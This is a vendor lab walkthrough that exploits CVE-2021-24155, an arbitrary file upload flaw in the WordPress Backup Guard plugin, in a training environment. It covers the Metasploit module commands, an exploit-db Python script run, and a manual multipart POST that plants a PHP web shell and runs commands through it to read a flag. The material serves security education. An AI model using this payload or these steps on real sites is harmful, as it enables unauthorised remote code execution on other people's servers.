Resources
    Lab Walkthrough - WordPre ...
    26 September 22

    Lab Walkthrough - WordPress Plugin Backup Guard RCE

    Posted byINE
    facebooktwitterlinkedin
    news-featured

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    This exercise is to understand how to exploit the WordPress Plugin Backup Guard v1.5.8 to gain a shell of the target machine (CVE-2021-24155). 

    Purpose: We will learn how to exploit the WordPress Plugin Backup Guard using the Metasploit Framework module. We will see how to exploit it with a python script as well. We will also learn how to exploit it manually to better understand the vulnerability. 

    Goal after completing this scenario: Access the /flag.txt file and read the flag!

    Technical difficulty: Beginner

    Introduction

    In 2021, a critical vulnerability was found in the WordPress Plugin Backup Guard. The plugin before v1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.

    This vulnerability has been assigned the CVE id CVE-2021-24155. The CVSS score for this vulnerability is 7.2 High.

    Source: https://nvd.nist.gov/vuln/detail/CVE-2021-24155

    What is WordPress Plugin Backup Guard?

    WordPress Backup and Migrate Plugin – Backup Guard allows you to easily Restore, Migrate and Backup WordPress website. Using this plugin one can easily backup and restore their WordPress files, database, or both.

    Source: https://wordpress.org/plugins/backup/

    Lab Link

    https://my.ine.com/INE/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/4d3b9c33-5751-4aac-a0de-60894a0f8e5a

     

    Lab Environment

    In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of WordPress Plugin Backup Guard is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local.

    The following credentials might be helpful:

    • Username: admin

    • Password: pass456

    Objective: Exploit the remote code execution (RCE) vulnerability in WordPress Plugin Backup Guard v1.5.8 to gain shell access on the target server and retrieve the flag!

    backup_guard_0.png

    Tools

    The best tools for this lab are:

    • Nmap

    • Dirb

    • Curl

    • A web browser

    • Python

    • Metasploit Framework

    Solution

    Step 1: Open the lab link to access the Kali GUI instance.

    backup_guard_1.png


    Step 2: Check if the provided machine/domain is reachable.

    Command: ping -c3 demo.ine.local

    backup_guard_2.png

    The provided machine is reachable. 192.205.133.3 is the IP address of the target machine.

     Step 3: Check open ports on the provided machine.

     Command: nmap -sS -sV demo.ine.local

    backup_guard_3.png

    Apache httpd 2.4.29 is running on port 80 on the target machine.

    Step 4: Next we will use dirb tool to find files and directories on the web server.

     Command: dirb http://demo.ine.local

    backup_guard_4.png

    Step 5: We can notice that WordPress is running on the target machine. We will run the dirb tool again to find installed plugins on the target machine.

     Command: dirb http://demo.ine.local/wp-content/plugins /usr/share/nmap/nselib/data/wp-plugins.lst

    backup_guard_5.png

    Step 6: We can notice, that the backup plugin is installed on the target machine. All the WordPress plugins have the "README.txt" or “readme.txt” file, from which we can find out the plugin version. We can use the curl command here to view the content of the "README.txt" file.

     Command: curl http://demo.ine.local/wp-content/plugins/backup/README.txt

    backup_guard_6.png

    The Stable tag shows 1.5.8, which is a vulnerable version.

    Exploit using Metasploit module

    Step 7: First check the attacker machine’s IP address.

    Command: ifconfig

    backup_guard_7.jpg

    192.205.133.2 is the attacker machine's IP address.

     Step 8: Start the msfconsole and do a search for the module for CVE-2021-24155.

    Commands:

    msfconsole -q

    search CVE-2021-24155

    backup_guard_8.png

     Step 9: We will use the above listed module. The credentials to use are:

    • Username: admin

    • Password: pass456

    Run the following commands one by one:

    Commands:

    use exploit/multi/http/wp_plugin_backup_guard_rce

    set username admin

    set password pass456

    set RHOSTS 192.205.133.3

    set LHOST 192.205.133.2

    check

    exploit

     Note: RHOSTS is the target machine IP address and LHOST is the attacker machine IP address. And these values may vary for you.

    backup_guard_9.png

    We have successfully gained the meterpreter session.

     Step 10: Let's retrieve the flag. Run the following command over the meterpreter to access bash.

    Command: shell

    backup_guard_10.png

     Step 11: Read the flag.

    Commands:

    ls /

    cat /flag.txt

    backup_guard_11.png

    FLAG: 7c5b7206468fd8cfdb779af6a037b6d7

    Exploit using python script

    Step 12: You can search for 'WordPress Plugin Backup Guard 1.5.8 exploit db' on google and get to the page shown below. Or you can use the direct link given below to go to the corresponding exploit db page. This contains the python3 script that we will use to exploit the vulnerability.

    Direct link: https://www.exploit-db.com/exploits/50093

    backup_guard_12.png


    Step 13: From the terminal, save the code in a file named exploit.py. The credentials to use are:

    • Username: admin

    • Password: pass456

    Now, run the script along with the required arguments as:

    Command: python3 exploit.py -T demo.ine.local -P 80 -U / -u admin -p pass456

    backup_guard_13.png


    Step 14: Open the webshell that you uploaded. Retrieve the flag by running the following commands:

    Commands:

    ls /

    cat /flag.txt

    backup_guard_14.png

    FLAG: 7c5b7206468fd8cfdb779af6a037b6d7

    Exploit manually

    Step 15: Navigate to the following URL and login into the WordPress application using the following credentials:

    URL: http://demo.ine.local/wp-admin

    • Username: admin

    • Password: pass456

    backup_guard_15.png


    Step 16: Configure the intercept on the browser as shown below.

    backup_guard_16.png


    Step 17: Start Burp Suite and just refresh the current page to capture the request. Next, send the captured request to the repeater. And then you can turn off the intercept.

    backup_guard_17.png


    Step 18: We will use the below endpoint to push a PHP backdoor in the uploads/backup-guard directory. Note that the token value might vary for you.

    Affected endpoint:

    URL: http://demo.ine.local/wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=107666bca9

    To fetch the token, go to the Backups page of the plugin, right-click on the page and click on View Page Source. You can locate the token here as shown.

    backup_guard_18.png

    backup_guard_18_1.png

    Replace the request in the repeater with the following. Remember to change the cookie and the token in your case. And then hit send.

    Request

    POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=107666bca9 HTTP/1.1
Host: demo.ine.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Encoding: gzip, deflate
Accept: application/json, text/javascript, */*; q=0.01
Connection: close
Accept-Language: de,en-US;q=0.7,en;q=0.3
Referer: http://demo.ine.local:80/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17366980624047956771255332862
Origin: http://demo.ine.local
Cookie: wordpress_c8b0349e5f5110aef36750b958f306dc=admin%7C1662196369%7CIj2UHCVsW6yyaOjmNwgpXqv17odxNCxP35L5v3llm88%7C73287e4c35f6bf383229fde7ca7be638ad27bccfa4b53052e7b0e16a9a6f1090; wp-settings-time-1=1662023569; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_c8b0349e5f5110aef36750b958f306dc=admin%7C1662196369%7CIj2UHCVsW6yyaOjmNwgpXqv17odxNCxP35L5v3llm88%7Cf579c17207683667e466a17461bf2ce0191d11fa0111c38a052802f8903f311b
Content-Length: 337



-----------------------------17366980624047956771255332862
Content-Disposition: form-data; name="files[]"; filename="backdoor.php"
Content-Type: image/png



<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>



-----------------------------17366980624047956771255332862--
    backup_guard_18_2.png

    A new file has been created in uploads/backup-guard/ folder.

    Step 19: Access the backdoor and run the command ls /.

    URL: http://demo.ine.local/wp-content/uploads/backup-guard/backdoor.php?cmd=ls /

    backup_guard_19.png

    The flag is there. Retrieve the flag with cat /flag.txt command.

    backup_guard_19_1.png

    FLAG: 7c5b7206468fd8cfdb779af6a037b6d7

    Conclusion

    In this lab we exploited the remote code execution vulnerability that exists in WordPress Plugin Backup Guard 1.5.8 using the Metasploit module, using python script as well as manually. The vulnerability occurred because it was not ensured that the imported files are of the SGBP format and extension.

    References

    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    Terms of servicePrivacy policy
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo